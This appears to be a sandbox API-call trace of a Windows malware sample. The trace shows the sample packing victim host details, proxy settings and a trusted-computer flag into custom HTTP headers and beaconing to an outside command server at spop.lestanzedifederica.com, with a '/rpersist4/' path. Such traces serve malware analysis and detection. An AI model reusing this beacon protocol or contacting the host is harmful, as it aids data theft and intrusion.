	[0112.131] GetLastError () returned 0x0
	[0112.131] GetLastError () returned 0x0
	[0112.132] GetLastError () returned 0x0
	[0112.132] GetLastError () returned 0x0
	[0112.132] GetLastError () returned 0x0
	[0112.132] GetLastError () returned 0x0
	[0112.132] GetLastError () returned 0x0
	[0112.132] GetLastError () returned 0x0
	[0112.132] GetLastError () returned 0x0
	[0112.132] GetLastError () returned 0x0
	[0112.132] GetLastError () returned 0x0
	[0112.132] GetLastError () returned 0x0
	[0112.132] GetLastError () returned 0x0
	[0112.132] GetLastError () returned 0x0
	[0112.132] GetLastError () returned 0x0
	[0112.132] GetLastError () returned 0x0
	[0112.132] GetLastError () returned 0x0
	[0112.132] GetLastError () returned 0x0
	[0112.132] GetLastError () returned 0x0
	[0112.132] GetLastError () returned 0x0
	[0112.132] GetLastError () returned 0x0
	[0112.132] GetLastError () returned 0x0
	[0112.132] GetLastError () returned 0x0
	[0112.132] GetLastError () returned 0x0
	[0112.132] GetLastError () returned 0x0
	[0112.132] GetLastError () returned 0x0
	[0112.132] GetLastError () returned 0x0
	[0112.132] GetLastError () returned 0x0
	[0112.132] GetLastError () returned 0x0
	[0112.132] GetLastError () returned 0x0
	[0112.132] GetLastError () returned 0x0
	[0112.132] GetLastError () returned 0x0
	[0112.132] wsprintfW (in: param_1=0x669f08, param_2="X-User-Info: %ws|%ws|0x%p|0x%p|%ws|%ws" | out: param_1="X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\\\*") returned 62
	[0112.132] lstrlenW (lpString="X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\\\*") returned 62
	[0112.132] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\\\*", dwHeadersLength=0x3e, dwModifiers=0x10000000) returned 1
	[0112.132] NetApiBufferFree (Buffer=0x39ac900) returned 0x0
	[0112.132] GetLastError () returned 0x0
	[0112.132] GetLastError () returned 0x0
	[0112.132] GetLastError () returned 0x0
	[0112.132] GetLastError () returned 0x0
	[0112.132] GetLastError () returned 0x0
	[0112.132] GetLastError () returned 0x0
	[0112.132] GetLastError () returned 0x0
	[0112.132] GetLastError () returned 0x0
	[0112.132] GetLastError () returned 0x0
	[0112.132] GetLastError () returned 0x0
	[0112.132] GetLastError () returned 0x0
	[0112.263] GetLastError () returned 0x0
	[0112.263] GetLastError () returned 0x0
	[0112.263] GetLastError () returned 0x0
	[0112.263] GetLastError () returned 0x0
	[0112.263] GetLastError () returned 0x0
	[0112.263] GetLastError () returned 0x0
	[0112.263] GetLastError () returned 0x0
	[0112.263] GetLastError () returned 0x0
	[0112.263] GetLastError () returned 0x0
	[0112.263] GetLastError () returned 0x0
	[0112.263] GetLastError () returned 0x0
	[0112.263] GetLastError () returned 0x0
	[0112.263] GetLastError () returned 0x0
	[0112.263] GetLastError () returned 0x0
	[0112.263] GetLastError () returned 0x0
	[0112.263] GetLastError () returned 0x0
	[0112.263] GetLastError () returned 0x0
	[0112.263] GetLastError () returned 0x0
	[0112.263] GetLastError () returned 0x0
	[0112.263] GetLastError () returned 0x0
	[0112.263] GetLastError () returned 0x0
	[0112.263] GetLastError () returned 0x0
	[0112.263] GetLastError () returned 0x0
	[0112.263] GetLastError () returned 0x0
	[0112.263] GetLastError () returned 0x0
	[0112.263] GetLastError () returned 0x0
	[0112.263] GetLastError () returned 0x0
	[0112.263] GetLastError () returned 0x0
	[0112.263] GetLastError () returned 0x0
	[0112.263] GetLastError () returned 0x0
	[0112.263] GetLastError () returned 0x0
	[0112.263] GetLastError () returned 0x0
	[0112.263] GetLastError () returned 0x0
	[0112.263] GetLastError () returned 0x0
	[0112.263] GetLastError () returned 0x0
	[0112.263] GetLastError () returned 0x0
	[0112.263] GetLastError () returned 0x0
	[0112.263] GetLastError () returned 0x0
	[0112.263] GetLastError () returned 0x0
	[0112.263] GetLastError () returned 0x0
	[0112.263] GetLastError () returned 0x0
	[0112.263] GetLastError () returned 0x0
	[0112.263] GetLastError () returned 0x0
	[0112.263] GetLastError () returned 0x0
	[0112.263] GetLastError () returned 0x0
	[0112.263] GetLastError () returned 0x0
	[0112.264] GetLastError () returned 0x0
	[0112.264] GetLastError () returned 0x0
	[0112.264] GetLastError () returned 0x0
	[0112.264] GetLastError () returned 0x0
	[0112.264] GetLastError () returned 0x0
	[0112.264] GetLastError () returned 0x0
	[0112.264] GetLastError () returned 0x0
	[0112.264] GetLastError () returned 0x0
	[0112.264] GetLastError () returned 0x0
	[0112.264] GetLastError () returned 0x0
	[0112.264] GetLastError () returned 0x0
	[0112.264] GetLastError () returned 0x0
	[0112.264] GetLastError () returned 0x0
	[0112.264] GetLastError () returned 0x0
	[0112.264] GetLastError () returned 0x0
	[0112.264] GetLastError () returned 0x0
	[0112.264] GetLastError () returned 0x0
	[0112.264] GetLastError () returned 0x0
	[0112.264] GetLastError () returned 0x0
	[0112.264] GetLastError () returned 0x0
	[0112.264] GetLastError () returned 0x0
	[0112.264] GetLastError () returned 0x0
	[0112.264] GetLastError () returned 0x0
	[0112.264] GetLastError () returned 0x0
	[0112.264] GetLastError () returned 0x0
	[0112.264] GetLastError () returned 0x0
	[0112.264] GetLastError () returned 0x0
	[0112.264] GetLastError () returned 0x0
	[0112.264] GetLastError () returned 0x0
	[0112.264] GetLastError () returned 0x0
	[0112.264] GetLastError () returned 0x0
	[0112.264] GetLastError () returned 0x0
	[0112.264] GetLastError () returned 0x0
	[0112.264] GetLastError () returned 0x0
	[0112.264] GetLastError () returned 0x0
	[0112.264] GetLastError () returned 0x0
	[0112.264] GetLastError () returned 0x0
	[0112.264] GetLastError () returned 0x0
	[0112.264] GetLastError () returned 0x0
	[0112.264] GetLastError () returned 0x0
	[0112.264] GetLastError () returned 0x0
	[0112.264] GetLastError () returned 0x0
	[0112.264] GetLastError () returned 0x0
	[0112.264] GetLastError () returned 0x0
	[0112.264] GetLastError () returned 0x0
	[0112.264] GetLastError () returned 0x0
	[0112.264] GetLastError () returned 0x0
	[0112.265] GetLastError () returned 0x0
	[0112.265] GetLastError () returned 0x0
	[0112.265] GetEnvironmentVariableA (in: lpName="crackmeololo", lpBuffer=0x205f1a8, nSize=0x104 | out: lpBuffer="") returned 0x0
	[0112.265] wsprintfW (in: param_1=0x669f08, param_2="X-IsTrustedComp: %d" | out: param_1="X-IsTrustedComp: 0") returned 18
	[0112.265] lstrlenW (lpString="X-IsTrustedComp: 0") returned 18
	[0112.265] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-IsTrustedComp: 0", dwHeadersLength=0x12, dwModifiers=0x10000000) returned 1
	[0112.265] GetLastError () returned 0x0
	[0112.265] GetLastError () returned 0x0
	[0112.265] GetLastError () returned 0x0
	[0112.265] GetLastError () returned 0x0
	[0112.265] GetLastError () returned 0x0
	[0112.265] GetLastError () returned 0x0
	[0112.265] GetLastError () returned 0x0
	[0112.265] GetLastError () returned 0x0
	[0112.265] GetLastError () returned 0x0
	[0112.265] GetLastError () returned 0x0
	[0112.265] GetLastError () returned 0x0
	[0112.265] GetLastError () returned 0x0
	[0112.265] GetLastError () returned 0x0
	[0112.265] GetLastError () returned 0x0
	[0112.265] GetLastError () returned 0x0
	[0112.265] GetLastError () returned 0x0
	[0112.265] GetLastError () returned 0x0
	[0112.265] GetLastError () returned 0x0
	[0112.265] GetLastError () returned 0x0
	[0112.265] GetLastError () returned 0x0
	[0112.265] GetLastError () returned 0x0
	[0112.265] GetLastError () returned 0x0
	[0112.265] GetLastError () returned 0x0
	[0112.265] GetLastError () returned 0x0
	[0112.265] GetLastError () returned 0x0
	[0112.265] GetLastError () returned 0x0
	[0112.265] GetLastError () returned 0x0
	[0112.265] GetLastError () returned 0x0
	[0112.265] GetLastError () returned 0x0
	[0112.265] GetLastError () returned 0x0
	[0112.265] GetLastError () returned 0x0
	[0112.265] GetLastError () returned 0x0
	[0112.265] GetLastError () returned 0x0
	[0112.265] GetLastError () returned 0x0
	[0112.265] GetLastError () returned 0x0
	[0112.265] GetLastError () returned 0x0
	[0112.266] GetLastError () returned 0x0
	[0112.266] GetLastError () returned 0x0
	[0112.266] GetLastError () returned 0x0
	[0112.266] GetLastError () returned 0x0
	[0112.266] GetLastError () returned 0x0
	[0112.266] GetLastError () returned 0x0
	[0112.266] GetLastError () returned 0x0
	[0112.266] GetLastError () returned 0x0
	[0112.266] GetLastError () returned 0x0
	[0112.266] GetLastError () returned 0x0
	[0112.266] GetLastError () returned 0x0
	[0112.266] GetLastError () returned 0x0
	[0112.266] GetLastError () returned 0x0
	[0112.266] GetLastError () returned 0x0
	[0112.266] GetLastError () returned 0x0
	[0112.266] GetLastError () returned 0x0
	[0112.266] GetLastError () returned 0x0
	[0112.266] GetLastError () returned 0x0
	[0112.266] GetLastError () returned 0x0
	[0112.266] GetLastError () returned 0x0
	[0112.266] GetLastError () returned 0x0
	[0112.266] GetLastError () returned 0x0
	[0112.266] GetLastError () returned 0x0
	[0112.266] GetLastError () returned 0x0
	[0112.266] GetLastError () returned 0x0
	[0112.266] GetLastError () returned 0x0
	[0112.266] GetLastError () returned 0x0
	[0112.266] GetLastError () returned 0x0
	[0112.266] GetLastError () returned 0x0
	[0112.266] GetLastError () returned 0x0
	[0112.266] GetLastError () returned 0x0
	[0112.266] GetLastError () returned 0x0
	[0112.266] GetLastError () returned 0x0
	[0112.266] GetLastError () returned 0x0
	[0112.266] GetLastError () returned 0x0
	[0112.266] GetLastError () returned 0x0
	[0112.266] GetLastError () returned 0x0
	[0112.266] GetLastError () returned 0x0
	[0112.266] GetLastError () returned 0x0
	[0112.266] GetLastError () returned 0x0
	[0112.266] GetLastError () returned 0x0
	[0112.266] GetLastError () returned 0x0
	[0112.266] GetLastError () returned 0x0
	[0112.266] GetLastError () returned 0x0
	[0112.266] GetLastError () returned 0x0
	[0112.266] GetLastError () returned 0x0
	[0112.266] GetLastError () returned 0x0
	[0112.266] GetLastError () returned 0x0
	[0112.266] GetLastError () returned 0x0
	[0112.267] GetLastError () returned 0x0
	[0112.267] GetLastError () returned 0x0
	[0112.267] GetLastError () returned 0x0
	[0112.267] lstrlenW (lpString="X-HTTP-Agent: WININET") returned 21
	[0112.267] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-HTTP-Agent: WININET", dwHeadersLength=0x15, dwModifiers=0x10000000) returned 1
	[0112.267] GetLastError () returned 0x0
	[0112.267] GetLastError () returned 0x0
	[0112.267] GetLastError () returned 0x0
	[0112.267] GetLastError () returned 0x0
	[0112.267] GetLastError () returned 0x0
	[0112.267] GetLastError () returned 0x0
	[0112.267] GetLastError () returned 0x0
	[0112.267] GetLastError () returned 0x0
	[0112.267] GetLastError () returned 0x0
	[0112.267] GetLastError () returned 0x0
	[0112.267] GetLastError () returned 0x0
	[0112.267] GetLastError () returned 0x0
	[0112.267] GetLastError () returned 0x0
	[0112.267] GetLastError () returned 0x0
	[0112.267] GetLastError () returned 0x0
	[0112.267] GetLastError () returned 0x0
	[0112.267] GetLastError () returned 0x0
	[0112.267] GetLastError () returned 0x0
	[0112.267] GetLastError () returned 0x0
	[0112.267] GetLastError () returned 0x0
	[0112.267] GetLastError () returned 0x0
	[0112.267] GetLastError () returned 0x0
	[0112.267] GetLastError () returned 0x0
	[0112.267] GetLastError () returned 0x0
	[0112.267] GetLastError () returned 0x0
	[0112.267] GetLastError () returned 0x0
	[0112.267] GetLastError () returned 0x0
	[0112.267] GetLastError () returned 0x0
	[0112.267] GetLastError () returned 0x0
	[0112.267] GetLastError () returned 0x0
	[0112.267] GetLastError () returned 0x0
	[0112.267] GetLastError () returned 0x0
	[0112.267] GetLastError () returned 0x0
	[0112.267] GetLastError () returned 0x0
	[0112.267] GetLastError () returned 0x0
	[0112.267] GetLastError () returned 0x0
	[0112.267] GetLastError () returned 0x0
	[0112.267] GetLastError () returned 0x0
	[0112.267] GetLastError () returned 0x0
	[0112.267] GetLastError () returned 0x0
	[0112.267] GetLastError () returned 0x0
	[0112.267] GetLastError () returned 0x0
	[0112.267] GetLastError () returned 0x0
	[0112.267] GetLastError () returned 0x0
	[0112.268] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-Proxy-Present: FALSE", dwHeadersLength=0x16, dwModifiers=0x10000000) returned 1
	[0112.268] lstrlenW (lpString="X-Proxy-Used: FALSE") returned 19
	[0112.268] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-Proxy-Used: FALSE", dwHeadersLength=0x13, dwModifiers=0x10000000) returned 1
	[0112.268] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x205f2c8 | out: phkResult=0x205f2c8*=0x690) returned 0x0
	[0112.268] RegQueryValueExW (in: hKey=0x690, lpValueName="AutoDetect", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x205f2cc*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x205f2cc*=0x0) returned 0x2
	[0112.268] RegCloseKey (hKey=0x690) returned 0x0
	[0112.269] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-Proxy-AutoDetect: FALSE", dwHeadersLength=0x19, dwModifiers=0x10000000) returned 1
	[0112.269] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x205fb1c, lpdwBufferLength=0x205fafc | out: lpBuffer=0x205fb1c, lpdwBufferLength=0x205fafc) returned 1
	[0112.269] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x205fb1c, dwBufferLength=0x4) returned 1
	[0112.269] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0 | out: lpOptional=0x0*) returned 1
	[0122.937] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x205fb24, lpdwBufferLength=0x205fb28, lpdwIndex=0x0 | out: lpBuffer=0x205fb24*, lpdwBufferLength=0x205fb28*=0x4, lpdwIndex=0x0) returned 1
	[0122.937] InternetCloseHandle (hInternet=0xcc000c) returned 1
	[0122.937] InternetCloseHandle (hInternet=0xcc0008) returned 1
	[0122.937] InternetCloseHandle (hInternet=0xcc0004) returned 1
	[0122.938] GetLastError () returned 0x0
	[0122.938] GetLastError () returned 0x0
	[0122.938] GetLastError () returned 0x0
	[0122.938] GetLastError () returned 0x0
	[0122.938] GetLastError () returned 0x0
	[0122.938] GetLastError () returned 0x0
	[0122.938] GetLastError () returned 0x0
	[0122.938] GetLastError () returned 0x0
	[0122.938] GetLastError () returned 0x0
	[0122.938] GetLastError () returned 0x0
	[0122.938] GetLastError () returned 0x0
	[0122.938] GetLastError () returned 0x0
	[0122.938] GetLastError () returned 0x0
	[0122.938] GetLastError () returned 0x0
	[0122.938] GetLastError () returned 0x0
	[0122.938] GetLastError () returned 0x0
	[0122.938] GetLastError () returned 0x0
	[0122.938] GetLastError () returned 0x0
	[0122.938] GetLastError () returned 0x0
	[0122.938] GetLastError () returned 0x0
	[0122.938] GetLastError () returned 0x0
	[0122.938] GetLastError () returned 0x0
	[0122.938] GetLastError () returned 0x0
	[0122.938] GetLastError () returned 0x0
	[0122.938] GetLastError () returned 0x0
	[0122.938] GetLastError () returned 0x0
	[0122.938] GetLastError () returned 0x0
	[0122.938] GetLastError () returned 0x0
	[0122.938] wsprintfA (in: param_1=0x205fe8c, param_2="/rpersist4/%d" | out: param_1="/rpersist4/1197631235") returned 21
	[0122.938] GetLastError () returned 0x0
	[0122.938] GetLastError () returned 0x0
	[0122.938] GetLastError () returned 0x0
	[0122.938] GetLastError () returned 0x0
	[0122.938] GetLastError () returned 0x0
	[0122.938] GetLastError () returned 0x0
	[0122.938] GetLastError () returned 0x0
	[0122.938] GetLastError () returned 0x0
	[0122.938] GetLastError () returned 0x0
	[0122.938] GetLastError () returned 0x0
	[0122.938] GetLastError () returned 0x0
	[0122.938] GetLastError () returned 0x0
	[0122.938] GetLastError () returned 0x0
	[0122.938] GetLastError () returned 0x0
	[0122.938] GetLastError () returned 0x0
	[0122.938] GetLastError () returned 0x0
	[0122.938] GetLastError () returned 0x0
	[0122.938] GetLastError () returned 0x0
	[0122.938] GetLastError () returned 0x0
	[0122.939] GetLastError () returned 0x0
	[0122.939] GetLastError () returned 0x0
	[0122.939] GetLastError () returned 0x0
	[0122.939] GetLastError () returned 0x0
	[0122.939] GetLastError () returned 0x0
	[0122.939] GetLastError () returned 0x0
	[0122.939] GetLastError () returned 0x0
	[0122.939] GetLastError () returned 0x0
	[0122.939] GetLastError () returned 0x0
	[0122.939] GetLastError () returned 0x0
	[0122.939] GetLastError () returned 0x0
	[0122.939] GetLastError () returned 0x0
	[0122.939] GetLastError () returned 0x0
	[0122.939] GetLastError () returned 0x0
	[0122.939] GetLastError () returned 0x0
	[0122.939] GetLastError () returned 0x0
	[0122.939] GetLastError () returned 0x0
	[0122.939] GetLastError () returned 0x0
	[0122.939] GetLastError () returned 0x0
	[0122.939] GetLastError () returned 0x0
	[0122.939] GetLastError () returned 0x0
	[0122.939] GetLastError () returned 0x0
	[0122.939] GetLastError () returned 0x0
	[0122.939] GetLastError () returned 0x0
	[0122.939] GetLastError () returned 0x0
	[0122.939] GetLastError () returned 0x0
	[0122.939] GetLastError () returned 0x0
	[0122.939] GetLastError () returned 0x0
	[0122.939] GetLastError () returned 0x0
	[0122.939] GetLastError () returned 0x0
	[0122.939] GetLastError () returned 0x0
	[0122.939] GetLastError () returned 0x0
	[0122.939] GetLastError () returned 0x0
	[0122.939] GetLastError () returned 0x0
	[0122.939] GetLastError () returned 0x0
	[0122.939] GetLastError () returned 0x0
	[0122.939] GetLastError () returned 0x0
	[0122.939] GetLastError () returned 0x0
	[0122.939] GetLastError () returned 0x0
	[0122.939] GetLastError () returned 0x0
	[0122.939] GetLastError () returned 0x0
	[0122.939] GetLastError () returned 0x0
	[0122.939] GetLastError () returned 0x0
	[0122.939] GetLastError () returned 0x0
	[0122.939] GetLastError () returned 0x0
	[0122.939] GetLastError () returned 0x0
	[0122.939] GetLastError () returned 0x0
	[0122.939] GetLastError () returned 0x0
	[0122.939] GetLastError () returned 0x0
	[0122.939] GetLastError () returned 0x0
	[0122.939] GetLastError () returned 0x0
	[0122.939] GetLastError () returned 0x0
	[0122.940] GetLastError () returned 0x0
	[0122.940] GetLastError () returned 0x0
	[0122.940] GetLastError () returned 0x0
	[0122.940] GetLastError () returned 0x0
	[0122.940] GetLastError () returned 0x0
	[0122.940] GetLastError () returned 0x0
	[0122.940] GetLastError () returned 0x0
	[0122.940] GetLastError () returned 0x0
	[0122.940] GetLastError () returned 0x0
	[0122.940] GetLastError () returned 0x0
	[0122.940] GetLastError () returned 0x0
	[0122.940] GetLastError () returned 0x0
	[0122.940] GetLastError () returned 0x0
	[0122.940] GetLastError () returned 0x0
	[0122.940] GetLastError () returned 0x0
	[0122.940] GetLastError () returned 0x0
	[0122.940] GetLastError () returned 0x0
	[0122.940] GetLastError () returned 0x0
	[0122.940] GetLastError () returned 0x0
	[0122.940] GetLastError () returned 0x0
	[0122.940] GetLastError () returned 0x0
	[0122.940] GetLastError () returned 0x0
	[0122.940] GetLastError () returned 0x0
	[0122.940] GetLastError () returned 0x0
	[0122.940] GetLastError () returned 0x0
	[0122.940] GetLastError () returned 0x0
	[0122.940] GetLastError () returned 0x0
	[0122.940] GetLastError () returned 0x0
	[0122.940] GetLastError () returned 0x0
	[0122.940] GetLastError () returned 0x0
	[0122.941] GetLastError () returned 0x0
	[0122.941] GetLastError () returned 0x0
	[0122.941] GetLastError () returned 0x0
	[0122.941] GetLastError () returned 0x0
	[0122.941] GetLastError () returned 0x0
	[0122.941] GetLastError () returned 0x0
	[0122.941] GetLastError () returned 0x0
	[0122.941] GetLastError () returned 0x0
	[0122.941] GetLastError () returned 0x0
	[0122.941] GetLastError () returned 0x0
	[0122.941] GetLastError () returned 0x0
	[0122.941] GetLastError () returned 0x0
	[0122.941] GetLastError () returned 0x0
	[0122.941] GetLastError () returned 0x0
	[0122.941] GetLastError () returned 0x0
	[0122.941] GetLastError () returned 0x0
	[0122.941] GetLastError () returned 0x0
	[0122.941] GetLastError () returned 0x0
	[0122.941] GetLastError () returned 0x0
	[0122.941] GetLastError () returned 0x0
	[0122.941] GetLastError () returned 0x0
	[0122.941] GetLastError () returned 0x0
	[0122.941] GetLastError () returned 0x0
	[0122.941] GetLastError () returned 0x0
	[0122.941] GetLastError () returned 0x0
	[0122.941] GetLastError () returned 0x0
	[0122.941] GetLastError () returned 0x0
	[0122.941] GetLastError () returned 0x0
	[0122.941] GetLastError () returned 0x0
	[0122.941] GetLastError () returned 0x0
	[0122.941] GetLastError () returned 0x0
	[0122.941] GetLastError () returned 0x0
	[0122.941] GetLastError () returned 0x0
	[0122.941] GetLastError () returned 0x0
	[0122.941] GetLastError () returned 0x0
	[0122.941] GetLastError () returned 0x0
	[0122.941] GetLastError () returned 0x0
	[0122.941] GetLastError () returned 0x0
	[0122.941] GetLastError () returned 0x0
	[0122.941] GetLastError () returned 0x0
	[0122.941] GetLastError () returned 0x0
	[0122.941] GetLastError () returned 0x0
	[0122.941] GetLastError () returned 0x0
	[0122.941] GetLastError () returned 0x0
	[0122.941] GetLastError () returned 0x0
	[0122.941] GetLastError () returned 0x0
	[0122.941] GetLastError () returned 0x0
	[0122.941] GetLastError () returned 0x0
	[0122.941] GetLastError () returned 0x0
	[0122.941] GetLastError () returned 0x0
	[0122.942] GetLastError () returned 0x0
	[0122.942] GetLastError () returned 0x0
	[0122.942] GetLastError () returned 0x0
	[0122.942] GetLastError () returned 0x0
	[0122.942] GetLastError () returned 0x0
	[0122.942] GetLastError () returned 0x0
	[0122.942] GetLastError () returned 0x0
	[0122.942] GetLastError () returned 0x0
	[0122.942] GetLastError () returned 0x0
	[0122.942] GetLastError () returned 0x0
	[0122.942] GetLastError () returned 0x0
	[0122.942] GetLastError () returned 0x0
	[0122.942] GetLastError () returned 0x0
	[0122.942] GetLastError () returned 0x0
	[0122.942] GetLastError () returned 0x0
	[0122.942] GetLastError () returned 0x0
	[0122.942] GetLastError () returned 0x0
	[0122.942] GetLastError () returned 0x0
	[0122.942] GetLastError () returned 0x0
	[0122.942] GetLastError () returned 0x0
	[0122.942] GetLastError () returned 0x0
	[0122.942] GetLastError () returned 0x0
	[0122.942] GetLastError () returned 0x0
	[0122.942] GetLastError () returned 0x0
	[0122.942] GetLastError () returned 0x0
	[0122.942] GetLastError () returned 0x0
	[0122.942] GetLastError () returned 0x0
	[0122.942] GetLastError () returned 0x0
	[0122.942] GetLastError () returned 0x0
	[0122.942] GetLastError () returned 0x0
	[0122.942] GetLastError () returned 0x0
	[0122.942] GetLastError () returned 0x0
	[0122.942] GetLastError () returned 0x0
	[0122.942] GetLastError () returned 0x0
	[0122.942] GetLastError () returned 0x0
	[0122.942] GetLastError () returned 0x0
	[0122.942] GetLastError () returned 0x0
	[0122.942] GetLastError () returned 0x0
	[0122.942] GetLastError () returned 0x0
	[0122.942] GetLastError () returned 0x0
	[0122.942] GetLastError () returned 0x0
	[0122.942] GetLastError () returned 0x0
	[0122.942] GetLastError () returned 0x0
	[0122.942] GetLastError () returned 0x0
	[0122.942] GetLastError () returned 0x0
	[0122.942] GetLastError () returned 0x0
	[0122.942] GetLastError () returned 0x0
	[0122.942] GetLastError () returned 0x0
	[0122.942] GetLastError () returned 0x0
	[0122.942] GetLastError () returned 0x0
	[0122.942] GetLastError () returned 0x0
	[0122.942] GetLastError () returned 0x0
	[0122.942] GetLastError () returned 0x0
	[0122.942] GetLastError () returned 0x0
	[0122.942] GetLastError () returned 0x0
	[0122.942] GetLastError () returned 0x0
	[0122.942] GetLastError () returned 0x0
	[0122.942] GetLastError () returned 0x0
	[0122.943] GetLastError () returned 0x0
	[0122.943] GetLastError () returned 0x0
	[0122.943] GetLastError () returned 0x0
	[0122.943] GetLastError () returned 0x0
	[0122.943] GetLastError () returned 0x0
	[0122.943] GetLastError () returned 0x0
	[0122.943] GetLastError () returned 0x0
	[0122.943] GetLastError () returned 0x0
	[0122.943] GetLastError () returned 0x0
	[0122.943] GetLastError () returned 0x0
	[0122.943] GetLastError () returned 0x0
	[0122.943] GetLastError () returned 0x0
	[0122.943] GetLastError () returned 0x0
	[0122.943] GetLastError () returned 0x0
	[0122.943] GetLastError () returned 0x0
	[0122.943] GetLastError () returned 0x0
	[0122.943] GetLastError () returned 0x0
	[0122.943] GetLastError () returned 0x0
	[0122.943] GetLastError () returned 0x0
	[0122.943] GetLastError () returned 0x0
	[0122.943] GetLastError () returned 0x0
	[0122.943] GetLastError () returned 0x0
	[0122.943] GetLastError () returned 0x0
	[0122.943] GetLastError () returned 0x0
	[0122.943] GetLastError () returned 0x0
	[0122.943] GetLastError () returned 0x0
	[0122.943] GetLastError () returned 0x0
	[0122.943] GetLastError () returned 0x0
	[0122.943] GetLastError () returned 0x0
	[0122.943] GetLastError () returned 0x0
	[0122.943] GetLastError () returned 0x0
	[0122.943] GetLastError () returned 0x0
	[0122.943] GetLastError () returned 0x0
	[0122.943] GetLastError () returned 0x0
	[0122.943] GetLastError () returned 0x0
	[0122.943] GetLastError () returned 0x0
	[0122.943] GetLastError () returned 0x0
	[0122.943] GetLastError () returned 0x0
	[0122.943] GetLastError () returned 0x0
	[0122.943] GetLastError () returned 0x0
	[0122.943] GetLastError () returned 0x0
	[0122.943] GetLastError () returned 0x0
	[0122.943] GetLastError () returned 0x0
	[0122.943] GetLastError () returned 0x0
	[0122.943] GetLastError () returned 0x0
	[0122.943] GetLastError () returned 0x0
	[0122.943] GetLastError () returned 0x0
	[0122.943] GetLastError () returned 0x0
	[0122.943] GetLastError () returned 0x0
	[0122.943] GetLastError () returned 0x0
	[0122.943] GetLastError () returned 0x0
	[0122.943] GetLastError () returned 0x0
	[0122.943] GetLastError () returned 0x0
	[0122.943] GetLastError () returned 0x0
	[0122.943] GetLastError () returned 0x0
	[0122.943] GetLastError () returned 0x0
	[0122.943] GetLastError () returned 0x0
	[0122.943] GetLastError () returned 0x0
	[0122.943] GetLastError () returned 0x0
	[0122.944] GetLastError () returned 0x0
	[0122.944] GetLastError () returned 0x0
	[0122.944] GetLastError () returned 0x0
	[0122.944] GetLastError () returned 0x0
	[0122.944] GetLastError () returned 0x0
	[0122.944] GetLastError () returned 0x0
	[0122.944] GetLastError () returned 0x0
	[0122.944] GetLastError () returned 0x0
	[0122.944] GetLastError () returned 0x0
	[0122.944] GetLastError () returned 0x0
	[0122.944] GetLastError () returned 0x0
	[0122.944] GetLastError () returned 0x0
	[0122.944] GetLastError () returned 0x0
	[0122.944] GetLastError () returned 0x0
	[0122.944] GetLastError () returned 0x0
	[0122.944] GetLastError () returned 0x0
	[0122.944] GetLastError () returned 0x0
	[0122.944] GetLastError () returned 0x0
	[0122.944] GetLastError () returned 0x0
	[0122.944] GetLastError () returned 0x0
	[0122.944] GetLastError () returned 0x0
	[0122.944] GetLastError () returned 0x0
	[0122.944] GetLastError () returned 0x0
	[0122.944] GetLastError () returned 0x0
	[0122.944] GetLastError () returned 0x0
	[0122.944] GetLastError () returned 0x0
	[0122.944] GetLastError () returned 0x0
	[0122.944] GetLastError () returned 0x0
	[0122.944] GetLastError () returned 0x0
	[0122.944] GetLastError () returned 0x0
	[0122.944] GetLastError () returned 0x0
	[0122.944] GetLastError () returned 0x0
	[0122.944] GetLastError () returned 0x0
	[0122.944] GetLastError () returned 0x0
	[0122.944] GetLastError () returned 0x0
	[0122.944] GetLastError () returned 0x0
	[0122.944] GetLastError () returned 0x0
	[0122.944] GetLastError () returned 0x0
	[0122.944] GetLastError () returned 0x0
	[0122.944] GetLastError () returned 0x0
	[0122.944] GetLastError () returned 0x0
	[0122.944] GetLastError () returned 0x0
	[0122.944] GetLastError () returned 0x0
	[0122.944] GetLastError () returned 0x0
	[0122.944] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x205f8d8 | out: phkResult=0x205f8d8*=0x2dc) returned 0x0
	[0122.945] RegQueryValueExW (in: hKey=0x2dc, lpValueName="ProxyEnable", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x205f8dc*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x205f8dc*=0x4) returned 0x0
	[0122.945] RegQueryValueExW (in: hKey=0x2dc, lpValueName="ProxyEnable", lpReserved=0x0, lpType=0x0, lpData=0x69d618, lpcbData=0x205f8dc*=0x4 | out: lpType=0x0, lpData=0x69d618*=0x0, lpcbData=0x205f8dc*=0x4) returned 0x0
	[0122.946] RegCloseKey (hKey=0x2dc) returned 0x0
	[0122.946] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/21000101 Firefox/25.0", dwAccessType=0x1, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
	[0122.946] InternetConnectA (hInternet=0xcc0004, lpszServerName="spop.lestanzedifederica.com", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008
	[0122.946] GetLastError () returned 0x0
	[0122.946] GetLastError () returned 0x0
	[0122.946] GetLastError () returned 0x0
	[0122.946] GetLastError () returned 0x0
	[0122.946] GetLastError () returned 0x0
	[0122.946] GetLastError () returned 0x0
	[0122.946] GetLastError () returned 0x0
	[0122.946] GetLastError () returned 0x0
	[0122.946] GetLastError () returned 0x0
